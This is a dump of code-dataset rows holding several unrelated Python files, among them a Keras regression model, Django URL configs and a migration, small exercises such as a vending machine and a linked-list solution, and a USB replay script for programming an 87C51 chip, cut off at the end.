blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8c4a0168b50f426ab45839426dfa6664e25931d6 | 10af49f1e24311025905b42aa412fb814b7a2c8b | /app/mod_dafd/models/forward_models/NeuralNetModel_keras.py | 04f41a2c9d161b0f1a31329c74efe52402ac7bd3 | [] | no_license | CIDARLAB/neural-optimizer | 192dab49887d11017c2698bfe03663ab4268f229 | 61b43fa20ec9e502539cc95085e991a8fa884735 | refs/heads/master | 2023-02-20T08:52:19.757774 | 2020-07-11T06:32:58 | 2020-07-11T06:32:58 | 233,903,550 | 4 | 1 | null | 2023-02-02T06:42:30 | 2020-01-14T18:02:41 | Python | UTF-8 | Python | false | false | 3,719 | py | """
Created on Fri Nov 23 19:05:38 2018
@author: noushinm
"""
from keras import metrics
from keras.layers import Dense, Activation
from keras.models import Sequential
import matplotlib.pyplot as plt
import numpy as np
# Reading an excel file using Python
from sklearn import model_selection
import pandas as pd
from sklearn.preprocessing import StandardScaler
from keras.callbacks import EarlyStopping
from keras.models import model_from_json
from keras.utils import plot_model
#from keras.utils.vis_utils import plot_model
import sys
from sklearn.neural_network import MLPRegressor
import numpy as np
import os
# root mean squared error (rmse) for regression
def rmse(y_true, y_pred):
    """Root mean squared error metric for Keras regression models."""
    from keras import backend as K
    squared_error = K.square(y_pred - y_true)
    return K.sqrt(K.mean(squared_error, axis=-1))
# mean squared error (mse) for regression
def mse(y_true, y_pred):
    """Mean squared error metric for Keras regression models."""
    from keras import backend as K
    squared_error = K.square(y_pred - y_true)
    return K.mean(squared_error, axis=-1)
# coefficient of determination (R^2) for regression
def r_square(y_true, y_pred):
    """Coefficient of determination (R^2) metric for Keras regression models."""
    from keras import backend as K
    residual_ss = K.sum(K.square(y_true - y_pred))
    total_ss = K.sum(K.square(y_true - K.mean(y_true)))
    # epsilon() guards against division by zero when the targets are constant
    return 1 - residual_ss / (total_ss + K.epsilon())
def r_square_loss(y_true, y_pred):
    """Loss form of R^2 for Keras: minimizing SS_res/SS_tot maximizes R^2.

    The original returned ``1 - (1 - SS_res/(SS_tot + eps))``; the redundant
    double negation is dropped since it is algebraically the same value.
    """
    from keras import backend as K
    SS_res = K.sum(K.square(y_true - y_pred))
    SS_tot = K.sum(K.square(y_true - K.mean(y_true)))
    # epsilon() guards against division by zero when the targets are constant
    return SS_res / (SS_tot + K.epsilon())
class NeuralNetModel_keras:
    """Keras feed-forward regression model with save/load helpers.

    Trained models are persisted next to this file under ``saved/`` as
    ``<output_name><regime>.json`` (architecture) and ``.h5`` (weights).
    """

    # Shared default; replaced per instance by train_model()/load_model().
    regression_model = None

    def train_model(self, output_name, regime, features, labels):
        """Build, train and persist a 4-hidden-layer regression network.

        :param output_name: base name for the saved model files
        :param regime: appended (via str()) to output_name to form the model name
        :param features: iterable of 8-element feature vectors (input_dim=8)
        :param labels: iterable of scalar regression targets
        """
        model_name = output_name + str(regime)
        print(model_name)
        # Initialising the ANN
        self.regression_model = Sequential()
        # Adding the input layer and the first hidden layer
        self.regression_model.add(Dense(16, activation = 'relu', input_dim = 8))
        # Adding the second hidden layer
        self.regression_model.add(Dense(units = 16, activation = 'relu'))
        # Adding the third hidden layer
        self.regression_model.add(Dense(units = 16, activation = 'relu'))
        # Adding the 4th hidden layer
        self.regression_model.add(Dense(units = 8, activation = 'relu'))
        # Adding the output layer (single linear unit for regression)
        self.regression_model.add(Dense(units = 1))
        # Compiling the NN; rmse and r_square are the module-level custom metrics
        self.regression_model.compile(optimizer = 'nadam', loss = 'mean_squared_error',metrics=['mean_squared_error', rmse, r_square] )#metrics=[metrics.mae, metrics.categorical_accuracy]
        # Stop early once training MSE has not improved for 20 epochs
        earlystopping=EarlyStopping(monitor="mean_squared_error", patience=20, verbose=0, mode='auto')
        # Fitting the NN to the Training set
        train_features = np.stack(features)
        train_labels = np.stack(labels)
        print(train_labels.shape)
        self.regression_model.fit(train_features, train_labels, batch_size = 10, epochs = 500, callbacks=[earlystopping])#
        # serialize model to JSON
        model_json = self.regression_model.to_json()
        with open(os.path.dirname(os.path.abspath(__file__)) + "/saved/" + model_name + ".json", "w") as json_file:
            json_file.write(model_json)
        # serialize weights to HDF5
        self.regression_model.save_weights(os.path.dirname(os.path.abspath(__file__)) + "/saved/" + model_name + ".h5")

    def load_model(self, output_name, regime):
        """Restore a previously trained model (architecture + weights) from saved/."""
        model_name = output_name + str(regime)
        # load json and create model
        json_file = open(os.path.dirname(os.path.abspath(__file__)) + "/saved/" + model_name + ".json", 'r')
        loaded_model_json = json_file.read()
        json_file.close()
        loaded_model = model_from_json(loaded_model_json)
        # load weights into new model
        loaded_model.load_weights(os.path.dirname(os.path.abspath(__file__)) + "/saved/" + model_name + ".h5")
        self.regression_model = loaded_model

    def predict(self, features):
        """Return the prediction for a single feature vector (reshaped to one row)."""
        return self.regression_model.predict(np.asarray(features).reshape(1, -1))[0]
| [
"mardian@bu.edu"
] | mardian@bu.edu |
de4b196851632d1bba1bc9a91f4a272ca309314c | 03efadf7ad38dc723d51b4e7d5d58c43179d2ef7 | /test/git/test_set_author.py | 8db708eb454a6b556e8c3ee186dac94c76e2989f | [
"Apache-2.0"
] | permissive | sapphon/guet | bff70d5f936736f536909fc939195f736dc2514e | 60872bfb149ad16a3c5309e283a6b886080a13dc | refs/heads/master | 2020-09-05T16:07:27.668793 | 2019-11-07T05:20:35 | 2019-11-07T05:20:35 | 220,151,959 | 0 | 0 | Apache-2.0 | 2019-11-07T04:32:10 | 2019-11-07T04:32:09 | null | UTF-8 | Python | false | false | 765 | py | import unittest
from unittest.mock import patch, MagicMock
from guet.git.set_author import configure_git_author
@patch('guet.git.set_author.subprocess.Popen')
class SetAuthorTest(unittest.TestCase):
    """Unit tests for guet.git.set_author.configure_git_author.

    The class-level @patch replaces subprocess.Popen, so each test method
    receives the mock as its extra argument.
    """

    def test_should_open_subprocess_to_set_user_name(self, mock_subprocess_popen):
        # configure_git_author must shell out to `git config user.name <name>`
        configure_git_author('name', 'email')
        mock_subprocess_popen.assert_any_call(['git', 'config', 'user.name', 'name'])
        # ...and wait for the subprocess to finish
        mock_subprocess_popen.return_value.wait.assert_called()

    def test_should_open_subprocess_to_set_user_email(self, mock_subprocess_popen):
        # configure_git_author must shell out to `git config user.email <email>`
        configure_git_author('name', 'email')
        mock_subprocess_popen.assert_any_call(['git', 'config', 'user.email', 'email'])
        mock_subprocess_popen.return_value.wait.assert_called()
| [
"chrisboyerdev@gmail.com"
] | chrisboyerdev@gmail.com |
0991be737f49582ec10aa7eedbd0a61d6dfe7b40 | 9b0bdebe81e558d3851609687e4ccd70ad026c7f | /剑指offer/02.从尾到头打印链表.py | c171768fb4cf4ebffccff7c7bf930ebb8b0066c0 | [] | no_license | lizenghui1121/DS_algorithms | 645cdad007ccbbfa82cc5ca9e3fc7f543644ab21 | 9690efcfe70663670691de02962fb534161bfc8d | refs/heads/master | 2022-12-13T22:45:23.108838 | 2020-09-07T13:40:17 | 2020-09-07T13:40:17 | 275,062,257 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 509 | py | """
输入一个链表,按链表从尾到头的顺序返回一个ArrayList。
@Author: Li Zenghui
@Date: 2020-03-02 20:10
"""
# -*- coding:utf-8 -*-
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
    # Return the node values from tail to head, e.g. [1, 2, 3].
    def printListFromTailToHead(self, listNode):
        """Collect the values of a singly linked list in reverse order.

        :param listNode: head node (with .val/.next attributes) or None
        :return: list of values from tail to head

        Appending then reversing is O(n); the original ``res.insert(0, ...)``
        was O(n^2) because every insert shifts the whole list.
        """
        res = []
        node = listNode
        while node:
            res.append(node.val)
            node = node.next
        res.reverse()
        return res
"954267393@qq.com"
] | 954267393@qq.com |
4129d51ac3213f7da523015c22e8003135f0791c | 560a8a5909084c2a06739f24c8a354cf4a5700ad | /classes/users.py | a3d90e0319700281a52264d51d18c2ec628da8ae | [] | no_license | Gerg95/learning-python | f20706b16b6c336e259d281c346ef2d2075fb357 | f9c61cf06c89a5ac0725b8a15ba88d48c537744a | refs/heads/master | 2020-03-09T18:35:53.925748 | 2018-05-19T12:50:38 | 2018-05-19T12:50:38 | 128,936,614 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,208 | py | class Users():
def __init__(self, first_name, last_name, email, phone_number, age):
    """Store the user's identity details and reset the login counter."""
    self.first_name = first_name
    self.last_name = last_name
    self.email = email
    self.phone_number = phone_number
    self.age = age
    # Number of login attempts since the last reset.
    self.login_attempts = 0
def describe_user(self):
    """Print each stored detail of the user, one per line."""
    print("These are the user's details: ")
    print(self.first_name)
    print(self.last_name)
    print(self.email)
    # Extra parentheses kept from the original; prints phone_number as-is.
    print((self.phone_number))
    print(str(self.age))
def greet_user(self):
    """Print a title-cased greeting using the user's full name."""
    print("Hello " + self.first_name.title() + " " + self.last_name.title())
def increment_login_attempts(self):
    """Increase the login-attempt counter by one and print the new value."""
    self.login_attempts += 1
    print(str(self.login_attempts))
def reset_login_attempts(self):
    """Reset the login-attempt counter to zero and print it."""
    self.login_attempts = 0
    print(str(self.login_attempts))
class Admin(Users):
    """A Users subclass that additionally carries a list of privileges."""

    def __init__(self, first_name, last_name, email, phone_number, age):
        # Delegate all identity fields to Users, then start with no privileges.
        super().__init__(first_name, last_name, email, phone_number, age)
        self.privileges = []

    def list_privileges(self):
        """Print a header followed by one bulleted line per privilege."""
        print("\nPrivileges: ")
        for entry in self.privileges:
            print("- " + entry)
# Demo: create an admin user, then show their details and privileges.
user_1 = Admin('greg', 'evans', 'greg@me', 2948920102, 23)
user_1.describe_user()
# Privileges are assigned after construction (Admin.__init__ starts empty).
user_1.privileges = [
    'can add post',
    'can delete post',
    'can ban user']
user_1.list_privileges()
| [
"gregory@Gregorys-MacBook-Air.local"
] | gregory@Gregorys-MacBook-Air.local |
b08c2c670bcb0c5c3ca004b5b5e8ae7656f10ffa | 369b985626c565096a3e65635542ac708339b329 | /blog/urls.py | 9a3cbcfd3770f5beceeffc016a5790b887880504 | [
"MIT"
] | permissive | ernestmucheru/Week4-IP | 9a68b28a127d8746d777d7b67e2cc055d034980c | be80372a33cbc3e80644915db66e0bf51cced175 | refs/heads/main | 2023-06-27T19:45:48.071039 | 2021-07-27T06:34:22 | 2021-07-27T06:34:22 | 389,307,262 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 646 | py | from django.urls import path
# from .views import (PostListView,PostDetailView,PostCreateView,PostUpdateView,PostDeleteView)
from . import views
# Routes for the blog app. The class-based view routes are kept commented
# out; only the function-based create_post routes are active.
urlpatterns = [
    # path('', PostListView.as_view(), name='blog'),
    # path('post/<int:pk>/', PostDetailView.as_view(), name='post-detail'),
    # path('post/new/', PostCreateView.as_view(), name='post-create'),
    # path('post/<int:pk>/update/', PostUpdateView.as_view(), name='post-update'),
    # path('post/<int:pk>/delete/', PostDeleteView.as_view(), name='post-delete'),
    path('new-post', views.create_post, name='post'),
    # NOTE(review): both routes share name='post', so reverse('post') can only
    # resolve one of them — confirm this is intended.
    path('<hood_id>/new-post', views.create_post, name='post')
]
"you@example.com"
] | you@example.com |
9cd53f9956c4f3b83c98600a7487ba52b300ad4d | ee3a4e31fb1b2d466363ec580b69ddd7e272ba39 | /train.py | e7c29064a2477bcf953ae1fed37852ca885e9238 | [] | no_license | sachiel321/LSM_SNU | 6bb3665f71face20083f05c2c14afcab4aff6c6d | d4f48ec81144ee6897d16474bb51dcd76f0d9e93 | refs/heads/master | 2022-12-21T20:04:24.871026 | 2020-09-27T02:04:03 | 2020-09-27T02:04:03 | 298,932,332 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,669 | py | # -*- coding: utf-8 -*-
"""
@author:yym
"""
import torch
import numpy as np
import argparse
from cere.my_cerebellar_model import train_cerebellar
from LSM_SNU.LSM_SNU import train_LSM_SNU
from prefrontal.my_prefrontal_model import train_prefrontal
from coding.coding_and_decoding import seed_everything
from model.combine_rl import train_combine
from model.combine import actor_net
def get_parser():
    """Create the argparse parser holding every training hyper-parameter."""
    arg_parser = argparse.ArgumentParser(description='Train network respectively.')
    add = arg_parser.add_argument
    # NOTE(review): action="store_true" combined with default=True means the
    # -l/-s flags can never switch these values off from the command line —
    # confirm whether store_false was intended.
    add("--load_model", "-l", default=True, action="store_true",
        help="Run or not.")
    add("--save_model", "-s", default=True, action="store_true",
        help="Run or not.")
    add("--gpu", "-g", type=str, default="0", help='Choose GPU number.')
    add("--learning_rate", "-lr", type=float, default=1e-4)
    add("--N_step", "-n", type=int, default=2, help='How many step do you want to predict.')
    add("--iters", "-i", type=int, default=100, help='The training step.')
    add("--possion_num", "-p", type=int, default=50)
    add("--seed", "-seed", type=int, default=2)
    add("--mode", "-m", type=str, default="LSM_SNU", help='You can input LSM_SNU, cerebellar, train_combine and prefrontal to train different part.')
    return arg_parser
# Parse CLI arguments at import time and fix all RNG seeds for reproducibility.
parser = get_parser()
args = parser.parse_args()
seed_everything(args.seed)
def train(
        mode=args.mode,
        load_model=args.load_model,
        save_model=args.save_model,
        gpu=args.gpu,
        learning_rate=args.learning_rate,
        N_step=args.N_step,
        iters=args.iters,
        possion_num=args.possion_num):
    """Dispatch training to the sub-network selected by *mode*.

    Defaults are bound at import time from the parsed CLI arguments.
    Recognised modes: LSM_SNU, cerebellar, prefrontal, train_combine.
    """
    print("load_model", load_model)
    if mode == 'LSM_SNU':
        print(N_step)
        print(gpu)
        train_LSM_SNU(N_step, load_model, save_model, learning_rate, iters, gpu, possion_num)
        return
    if mode == 'cerebellar':
        train_cerebellar(load_model, save_model, learning_rate, iters, gpu, possion_num)
        return
    if mode == 'prefrontal':
        train_prefrontal(load_model, save_model, learning_rate, iters, gpu, possion_num, N_step)
        return
    if mode == 'train_combine':
        train_combine(N_step=N_step,
                      load_model=load_model,
                      save_model=save_model,
                      learning_rate=learning_rate,
                      iters=iters,
                      gpu=gpu,
                      possion_num=possion_num,
                      speed_limiter=100,
                      lenth=2 * 1000)
        return
    # Unknown mode: report and fall through without training.
    print('Training mode error! Only LSM_SNU, cerebellar and prefrontal are available')
# Script entry point: train with the defaults parsed from the command line.
if __name__ == "__main__":
    train()
| [
"yangyiming2019@ia.ac.cn"
] | yangyiming2019@ia.ac.cn |
1c5bc689e9b86c0757471afe47e523e15bd47a0a | 38011300c585583103f7fd7236e49225fc0e9fec | /pyshop/pyshop/urls.py | e05e114bb7117e1f576ed07e643cc281b9408dd5 | [
"Apache-2.0"
] | permissive | Fahad-Hafeez/PyShop | ad59ef9c03963bfb433f9072bf3e21a00dbd7adb | 825e55e4da9b9661f91562669c9b2599531fdc3c | refs/heads/main | 2023-03-12T22:33:57.456107 | 2021-03-04T10:36:02 | 2021-03-04T10:36:02 | 344,437,203 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 804 | py | """pyshop URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
# Root URL configuration: Django admin plus the products app routes.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('products/', include('products.urls'))
]
| [
"79376608+Fahad-Hafeez@users.noreply.github.com"
] | 79376608+Fahad-Hafeez@users.noreply.github.com |
9955279f88c832aa48f5df50ed7b9125a8a30059 | f35786637dbe2d9506b677665e369807350625b6 | /Django/basic/config/urls.py | 28baf08b5046a2a566d518e83bd6d9d556444dec | [] | no_license | Hyunta/Ai_course | ffbe563be6c08fe02d8999368949f8db6e39782b | 664c11ea0e190e5b1f60dd1def8f2c2696ddf33c | refs/heads/master | 2023-05-24T06:08:06.054767 | 2021-06-15T02:17:57 | 2021-06-15T02:17:57 | 354,764,700 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 921 | py | """config URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
# Root URL configuration: each app is mounted under its own URL prefix.
urlpatterns = [
    path('crawl/', include('crawl.urls')),
    path('user/', include('user.urls')),
    path('bbs/', include('bbs.urls')),
    path('api/', include('api.urls')),
    path('admin/', admin.site.urls),
]
"mohai2618@naver.com"
] | mohai2618@naver.com |
3b5f726402c44053f1a64f134f06579925212b87 | c1774024e4bf9f820c2a7f6116f7b6b12a13af18 | /movie/migrations/0001_initial.py | c1c06156a823ff7d497559b32a15d6b50d79f299 | [] | no_license | RezowanTalukder/Django_IMDB_Movie | b9c11fdcb2e2f9c64a6859a7656fc05957049dc4 | 0fcdbe55f473fdd8b4d387bad8aa6b8d67982580 | refs/heads/master | 2021-01-15T06:18:41.199212 | 2020-02-25T03:26:01 | 2020-02-25T03:26:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,141 | py | # Generated by Django 3.0.2 on 2020-02-22 12:10
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates the Movie table."""

    initial = True

    # First migration of the app, so nothing to depend on.
    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Movie',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=100)),
                ('description', models.TextField(max_length=1000)),
                ('image', models.ImageField(upload_to='movies')),
                # Short codes stored in the DB map to human-readable labels.
                ('category', models.CharField(choices=[('A', 'ACTION'), ('D', 'DRAMA'), ('C', 'COMEDY'), ('R', 'ROMANCE')], max_length=100)),
                ('language', models.CharField(choices=[('EN', 'ENGLISH'), ('BN', 'BANGLA')], max_length=100)),
                ('status', models.CharField(choices=[('RA', 'RECENTLY ADDED'), ('MW', 'MOST WATCHED'), ('TR', 'TOP RATED')], max_length=100)),
                ('year_of_production', models.DateField()),
                ('views_count', models.IntegerField(default=0)),
            ],
        ),
    ]
| [
"bsse0933@iit.du.ac.bd"
] | bsse0933@iit.du.ac.bd |
b9ccc72fc32f3a6e7d1b807659400de5b7399661 | 1a7a2c7072059a4da220ca5f4c6d645d796f17ae | /build/scripts-3.6/ex_gRSS.py | cc3530ce8e287e588da677d25a0be3682a8791bf | [
"MIT"
] | permissive | coding-to-music/GatherNews | 5468e127d0e2f401088bae3418513047825dbbcc | 596e4899efc1862cc449b61cfb4496a6af3e2a73 | refs/heads/master | 2021-09-15T08:09:53.800106 | 2018-05-29T02:03:42 | 2018-05-29T02:03:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 773 | py | """
========================================
Loading multiple RSS feeds into SQLite3
========================================
An example showing how GatherNews can be used load news articles from
RSS feeds into a database. This example allows you to create new tables
and load a SQLite3 database with News from multiple RSS feeds.
Feel free to contact me if you run into any problems.
"""
# Show the module docstring when the example is run.
print(__doc__)

# Author: Tyler Brown <tylers.pile@gmail.com>

# Import RSS feed capture class
from gathernews.gRSS import CaptureFeeds

# File path to where "feeds_list.txt" is located
file_path = "/home/tyler/code/GatherNews/examples/"

# Instantiate the class
capture_feeds = CaptureFeeds(file_path)

# Create tables, load database, remove duplicates
# (writes to a SQLite3 database, as described in the module docstring)
capture_feeds.load_db()
| [
"tylers.pile@gmail.com"
] | tylers.pile@gmail.com |
2678003eb90b64c0947da9b3472cbce58de7d0fe | ac498910ee746e0a37ef62723a021e60547bbca7 | /compound interest.py | 98b4cee4a945a8ddf8e499e0387907e78ee66aa1 | [] | no_license | RadhaKrishnan75/beginner-python | 6d87514a16a3381815acb535e329495e955a5cce | b4d17979bc895733d75989d6ad14c681c9934c05 | refs/heads/main | 2023-05-02T11:06:51.992486 | 2021-05-16T10:07:20 | 2021-05-16T10:07:20 | 367,829,431 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 320 | py | # Python3 program to find compound
# interest for given values.
def compound_interest(principle, rate, time):
    """Compute, print and return the compound interest.

    :param principle: initial amount invested
    :param rate: interest rate per period, in percent (e.g. 10.25 for 10.25%)
    :param time: number of compounding periods
    :return: the compound interest (amount - principle); the value is now
        returned as well as printed so callers can use it programmatically
        (previously the function only printed it and returned None).
    """
    amount = principle * (pow((1 + rate / 100), time))
    ci = amount - principle
    print("Compound interest is", ci)
    return ci


# Driver Code
compound_interest(10000, 10.25, 5)
"noreply@github.com"
] | RadhaKrishnan75.noreply@github.com |
726752bfca6f44f46e8f9ee2ad690a93e2d90b6a | 22a19102f26c91a194e43fdd51508a820b94cb1a | /VendingMachine.py | 68c05cc825edfc8d6b8416db3ef4a3735656da5c | [] | no_license | zaffron/vending-machine | daccaa1e736f716b048122483a6df5ba269c4385 | dc8ab74433a8a02dfe5fcb8def2c62528b45c1ba | refs/heads/master | 2023-06-25T22:07:58.050568 | 2021-07-20T04:20:27 | 2021-07-20T04:20:27 | 387,670,112 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,695 | py | from tabulate import tabulate
class VendingMachine:
    """A simple vending machine holding items and an inserted-cash balance.

    Items are any objects exposing ``.name``, ``.price``, ``.stock`` and a
    ``.buy()`` method that decrements their stock.
    """

    def __init__(self):
        self.amount = 0   # cash currently inserted
        self.items = []   # items loaded into the machine

    def addItem(self, item):
        """Load an item into the machine."""
        self.items.append(item)

    def showItems(self):
        """Print a table of in-stock items (item number, name, price)."""
        print("\nCurrently available items:\n")
        print("-----------------------------\n")
        availableItems = []
        # Bug fix: the original iterated `for index, item in self.items`,
        # which tries to unpack each item instead of numbering them.
        for index, item in enumerate(self.items):
            if item.stock != 0:
                availableItems.append([index, item.name, item.price])
        print(tabulate(availableItems, headers=['Item Number', 'Name', 'Price']))

    def addCash(self, cash):
        """Add inserted cash to the current balance."""
        self.amount = self.amount + cash

    def buyItem(self, item):
        """Dispense *item* if the balance covers its price; otherwise prompt."""
        if self.amount < item.price:
            print("Item costs more than you provided. Please insert more cash.")
        else:
            self.amount -= item.price
            item.buy()
            print(f'You got {item.name}')
            print(f'Cash remaining {self.amount}')

    def containsItem(self, wantedItem):
        """Return True if an in-stock item with the same name exists."""
        hasItem = False
        for item in self.items:
            # Bug fix: `&&` (a SyntaxError in Python) replaced with `and`.
            if item.stock != 0 and item.name == wantedItem.name:
                hasItem = True
                break
        # Bug fix: the original returned the undefined name `has_item`.
        return hasItem

    def getItem(self, wantedItem):
        """Return the first in-stock item matching wantedItem's name, or None."""
        gotItem = None
        for item in self.items:
            # Bug fix: `&&` (a SyntaxError in Python) replaced with `and`.
            if item.stock != 0 and item.name == wantedItem.name:
                gotItem = item
                break
        return gotItem

    def insertAmountForItem(self, item):
        """Prompt for more cash until the balance covers the item's price."""
        price = item.price
        while self.amount < price:
            print('Amount insufficient\n')
            print('-----------------------\n')
            moreAmount = float(input(f'Insert {price - self.amount}: '))
            if moreAmount:
                self.amount += moreAmount

    def refund(self):
        """Return any inserted cash and zero the balance."""
        if self.amount > 0:
            # NOTE: 'Transation' typo kept — it is existing user-visible output.
            print('Transation cancelled.\n')
            print(f'Cash refunded: {self.amount}')
            self.amount = 0
"avinashrijal@gmail.com"
] | avinashrijal@gmail.com |
84df37df94ef3c4a86e883fc459662587a40e5c2 | 10686640b326da3de4e37b08bebd9f7ec7609ca7 | /uvscada/bpm/i87c51/write.py | 05a1a477faa0b38d6118941655ab56c87cb0f289 | [
"BSD-2-Clause"
] | permissive | jshafer817/uvscada | 62e11d136e03968878bcd647c896c32acae23c79 | 206a6c0cbf241b037de1fab47ce6f386d61b7982 | refs/heads/master | 2021-01-18T05:00:32.710552 | 2017-02-26T03:06:34 | 2017-02-26T03:06:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,066 | py | import binascii
import time
import usb1
import libusb1
import sys
import struct
import inspect
from uvscada.usb import usb_wraps
from uvscada.bpm.bp1410_fw import load_fx2
from uvscada.bpm import bp1410_fw_sn, startup
from uvscada.bpm.cmd import bulk2, bulk86
from uvscada.bpm.cmd import sm_read, gpio_readi, led_mask_30, cmd_49, cmd_02, cmd_50, cmd_57s, cmd_57_94, cmd_57_50
from uvscada.bpm.cmd import sm_info0, sm_info1, sm_insert, sn_read, sm_info22, sm_info24, sm_info10
from uvscada.util import str2hex, hexdump
from uvscada.usb import validate_read, validate_readv
import read
import read_fw
import write_fw
class NotBlank(Exception):
    """Raised when the pre-program blank check reports the part is not erased."""
def open_dev(usbcontext=None):
    """Return an opened handle to the first device with VID:PID 14b9:0001
    (presumably the BP-1410 programmer, per the bp1410_fw imports — confirm).

    Creates a fresh usb1.USBContext when none is supplied; raises Exception
    if no matching device is attached.
    """
    if usbcontext is None:
        usbcontext = usb1.USBContext()

    print 'Scanning for devices...'
    for udev in usbcontext.getDeviceList(skip_on_error=True):
        vid = udev.getVendorID()
        pid = udev.getProductID()
        # Match on the programmer's fixed vendor/product IDs
        if (vid, pid) == (0x14b9, 0x0001):
            print
            print
            print 'Found device'
            print 'Bus %03i Device %03i: ID %04x:%04x' % (
                udev.getBusNumber(),
                udev.getDeviceAddress(),
                vid,
                pid)
            # Return on the first match; any further devices are ignored
            return udev.open()
    raise Exception("Failed to find a device")
# sm scan for large values
# Exception: prefix: wanted 0x08, got 0x2C
'''
TODO: handle this failure mode more gracefully.
If you try to program something you can't
(i.e., a non-erased part), you'll get
BadPrefix: Wanted prefix 0x18, got 0x08
with reply \x63\x01
'''
def fw_w(dev, fw, verbose=False):
    """Upload firmware image *fw* to the device in chunks of at most 0xCC bytes.

    Each chunk is written as <len><0x00><data> over bulk2. The final chunk
    uses prefix 0x08 and expects reply "\\x00"; intermediate chunks use prefix
    0x18 and expect reply "\\x0B".
    """
    pos = 0
    print 'FW load: begin'
    tstart = time.time()
    while pos < len(fw):
        remain = len(fw) - pos
        # At most 0xCC payload bytes per transfer
        chunk = fw[pos:pos + min(remain, 0xCC)]
        if len(chunk) == remain:
            # This chunk finishes the image
            prefix = 0x08
            reply = "\x00"
        else:
            prefix = 0x18
            reply = "\x0B"
        if verbose:
            print ' pos 0X%04X, len 0x%02X, prefix 0x%02X' % (pos, len(chunk), prefix)
        buff = bulk2(dev,
            chr(len(chunk)) + '\x00' + chunk,
            target=0x01, prefix=prefix)
        validate_read(reply, buff, "packet W: 429/430, R: 431/432")
        pos += len(chunk)
    tend = time.time()
    print 'FW load : end. Took %0.1f sec' % (tend - tstart,)
'''
First one is a program cycle, others are simply
FW load: begin
FW load : end. Took 2.7 sec
FW load: begin
FW load : end. Took 0.1 sec
FW load: begin
FW load : end. Took 0.1 sec
'''
def replay(dev, fw, cont=True, blank=True):
    """Replay the captured USB sequence that programs firmware *fw* into the part.

    :param dev: open USB device handle
    :param fw: firmware image bytes, uploaded in three fw_w() passes below
    :param cont: forwarded to read.replay1() for the initial setup replay
    :param blank: when True, run a blank check first; raises NotBlank if the
        part is not erased, or Exception on an unrecognized status byte

    The byte strings below were generated by uvusbreplay from a capture of
    the vendor software; the packet numbers in the comments refer to that
    capture. Do not edit them by hand.
    """
    bulkRead, bulkWrite, controlRead, controlWrite = usb_wraps(dev)

    # Generated by uvusbreplay 0.1
    # uvusbreplay copyright 2011 John McMaster <JohnDMcMaster@gmail.com>
    # cmd: /home/mcmaster/bin/usbrply --packet-numbers --no-setup --comment --fx2 --packet-numbers -j cap/2015-10-11/i87c51_13_write_cont_id_blank_v2_ff.cap
    # FIXME: size?
    read.replay1(dev, cont)

    # Generated from packet 363/364
    cmd_57s(dev, '\x8C', "\x00\x00")
    # Generated from packet 367/368
    cmd_50(dev, "\x18\x00")
    # Generated from packet 369/370
    buff = bulk2(dev,
        "\x66\xB8\x01\x2D\x66\x89\x05\x06\x00\x09\x00\x66\xB9\x00\x00\xB2" \
        "\x00\xFB\xFF\x25\x44\x11\x00\x00"
        , target=0x02)
    validate_read("\x8F\x00", buff, "packet W: 369/370, R: 371/372")
    # Generated from packet 373/374
    buff = bulk2(dev, "\x02", target=0x06)
    validate_read("\x90\x00\xB0\x5D\x09\x00", buff, "packet W: 373/374, R: 375/376")
    # Generated from packet 377/378
    buff = bulk2(dev, "\x57\x8F\x00\x57\x89\x00", target=0x02)
    validate_read("\x00\x00", buff, "packet W: 377/378, R: 379/380")
    # Generated from packet 381/382
    cmd_50(dev, "\x0A\x06")
    # Generated from packet 383/384
    buff = bulk2(dev, write_fw.p383, target=0x02)
    validate_read("\x90\x00", buff, "packet W: 383/384, R: 385/386")
    # Generated from packet 387/388
